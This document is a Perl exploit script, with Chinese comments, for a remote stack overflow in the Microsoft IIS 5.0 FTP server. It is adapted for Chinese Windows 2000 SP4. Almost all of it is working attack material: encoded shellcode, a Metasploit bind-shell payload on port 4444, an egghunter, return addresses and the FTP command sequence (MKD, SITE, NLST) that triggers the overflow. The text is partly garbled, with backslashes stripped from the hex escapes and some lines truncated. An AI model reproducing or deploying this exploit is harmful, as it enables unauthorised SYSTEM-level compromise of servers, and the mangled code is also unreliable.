Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版 绑定4444端口,Windows 2000 CN + SP4 测试通过,需要能建目录的用户,偏移地址若不通用,请自行修改。
#!/usr/bin/perl
IIS 5.0 FTP Server / Remote SYSTEM exploit
Win2k SP4 targets
bug found & exploited by Kingcope, kcope2googlemail.com
Affects IIS6 with stack cookie protection
Modded by muts, additional egghunter added for secondary larger payload
Might take a minute or two for the egg to be found.
Opens bind shell on port 4444
http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket; $|=1; $sc = “x89xe2xddxc5xd9x72xf4x5fx57x59x49x49x49x49x43” . “x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34” . “x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41” . “x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58” . “x50x38x41x43x4ax4ax49x45x36x4dx51x48x4ax4bx4f” . “x44x4fx47x32x46x32x42x4ax43x32x46x38x48x4dx46” . “x4ex47x4cx45x55x51x4ax44x34x4ax4fx48x38x46x34” . “x50x30x46x50x50x57x4cx4bx4bx4ax4ex4fx44x35x4a” . “x4ax4ex4fx43x45x4bx57x4bx4fx4dx37x41x41”;
./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b “x00x0ax0d”
$shell=“T00WT00W” .“xdaxdexbdx2dxe7x9bx9fx2bxc9xb1x56xd9x74x24xf4” . “x5ax83xeaxfcx31x6ax15x03x6ax15xcfx12x67x77x86” . “xddx98x88xf8x54x7dxb9x2ax02xf5xe8xfax40x5bx01” . “x71x04x48x92xf7x81x7fx13xbdxf7x4exa4x70x38x1c” . “x66x13xc4x5fxbbxf3xf5xafxcexf2x32xcdx21xa6xeb” . “x99x90x56x9fxdcx28x57x4fx6bx10x2fxeaxacxe5x85” . “xf5xfcx56x92xbexe4xddxfcx1ex14x31x1fx62x5fx3e” . “xebx10x5ex96x22xd8x50xd6xe8xe7x5cxdbxf1x20x5a” . “x04x84x5ax98xb9x9ex98xe2x65x2bx3dx44xedx8bxe5” . “x74x22x4dx6dx7ax8fx1ax29x9fx0excfx41x9bx9bxee” . “x85x2dxdfxd4x01x75xbbx75x13xd3x6ax8ax43xbbxd3” . “x2ex0fx2ex07x48x52x27xe4x66x6dxb7x62xf1x1ex85” . “x2dxa9x88xa5xa6x77x4exc9x9cxcfxc0x34x1fx2fxc8” . “xf2x4bx7fx62xd2xf3x14x72xdbx21xbax22x73x9ax7a” . “x93x33x4ax12xf9xbbxb5x02x02x16xc0x05xccx42x80” . “xe1x2dx75x36xadxb8x93x52x5dxedx0cxcbx9fxcax84” . “x6cxe0x38xb9x25x76x74xd7xf2x79x85xfdx50xd6x2d” . “x96x22x34xeax87x34x11x5axc1x0cxf1x10xbfxdfx60” . “x24xeax88x01xb7x71x49x4cxa4x2dx1ex19x1ax24xca” . “xb7x05x9exe9x4axd3xd9xaax90x20xe7x33x55x1cxc3” . “x23xa3x9dx4fx10x7bxc8x19xcex3dxa2xebxb8x97x19” . “xa2x2cx6ex52x75x2bx6fxbfx03xd3xc1x16x52xebxed” . “xfex52x94x10x9fx9dx4fx91xbfx7fx5axefx57x26x0f” . “x52x3axd9xe5x90x43x5ax0cx68xb0x42x65x6dxfcxc4” . “x95x1fx6dxa1x99x8cx8exe0x90”;
print “IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
”;
if ($#ARGV ne 1) {
print “usage: iiz5.pl
自行修改以下两个地址以增强通用性, 此俩地址在我机器上测试成功
$patch = “x7exd1xf9x7f”; $retaddr = “x9BxB1xF4x77”;
你可以使用wordexp的这两个跳转地址
#$patch = “x90x80xb7x6f”; #$retaddr = “xcdx60xb6x6f”;
这里也修改了, 多加了两个”K”, 因为$myfindsc中
用了”repne scasd[edi]“指令来查找Shellcode, 多
加两个”K”使其四字节对齐, 否则会找不到(通用性?)
$v = “KKKSEXY” . $sc . “V” x (500-length($sc)-5);
溢出时堆栈的基本状况
# |0 |104 | 108 |112 |164 |168 |172 |176 #$c = “A” x 104 . $patch . $patch. “A” x 52 . $patch . “AAAA”. $retaddr .$patch.”Aa4Aa5Aa6Aa7Aa8Aa9Ab”;
#void myfindsc() #{ # __asm # { # int 3; #start: # MOV EDX,ESP; # FCMOVNBE ST,ST(2); # _emit 0xd9; # _emit 0x72; # _emit 0xf4; FSTENV [edx-0Ch] # POP EBP; # PUSH EBP; # POP EBX; # PUSH 76h; # POP EAX; #xorsc: # XOR BYTE PTR DS:[EBX+28h],AL; patch “decode” 的0xff #findsc: # MOV EAX,66666666h; # SUB EAX,66566666h; # PUSH EAX; # POP EDI; # PUSH 21212121h; # POP ECX; # MOV EAX,59584553h; # REPNE SCAS DWORD PTR ES:[EDI]; #decode: # _emit 0x89; # _emit 0xE7; JMP EDI # } #}
#void main() #{ # myfindsc(); #}
修改用于定位Shellcode的代码, 由于该代码需要调
用call或者jmp等指令以跳转到Shellcode的地方, 此
类指令包含了0xff, 会被IIS过滤, 所以这里采用了自
修改的形式将0xff patch掉. 本来想要alpha2加密,
但是加密后内容太长.
$myfindsc = “x8bxd4xdbxd2xd9x72xf4x5dx55x5bx6ax76x58”. “x30x43x27xb8x66x66x66x66x2dx66x66x5Fx66”. “x50x5fx68x21x21x21x21x59xb8x53x45x58x59”. “xf2xafx89xe7”;
$c = $myfindsc . “A” x (104 - length($myfindsc)) . $patch . $patch. “xEBx8Ex44x44”.”A” x 48 . # |<— 第二次跳转: 到这里后最终跳到$myfindsc $patch . “AAAA”. $retaddr . $patch . “A” x 16 .“xE2xAA”.”NN”; # |<— 第一次跳转: 函数返回以后经过跳转来到这里, 但是$myfindsc太远, 就又跳了一次
$x = <$sock>; print $x; print $sock “USER anonimoos ”; $x = <$sock>; print $x; print $sock “PASS $shell ”; $x = <$sock>; print $x; print $sock “USER anonimoos ”; $x = <$sock>; print $x; print $sock “PASS $shell ”; $x = <$sock>; print $x;
print $sock “USER anonymous ”; $x = <$sock>; print $x; print $sock “PASS anonymous ”; $x = <$sock>; print $x; print $sock “MKD w00t$port ”; $x = <$sock>; print $x; print $sock “SITE $v ”; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “CWD w00t$port ”; $x = <$sock>; print $x; print $sock “MKD CCCC”. “$c ”; # 这里也被修改了, 多加了个C, 用于4字节对齐 $x = <$sock>; print $x; print $sock “PORT $locip,” . int($port / 256) . ”,” . int($port % 256) . ” ”; $x = <$sock>; print $x;
TRIGGER
print $sock “NLST $c*/../C*/ ”; $x = <$sock>; print $x; } else { my $servsock = IO::Socket::INET->new(LocalAddr => “0.0.0.0”, LocalPort => $port, Proto => ‘tcp’, Listen => 1); die “Could not create socket: $! ” unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio,
#Kingcope
via baicker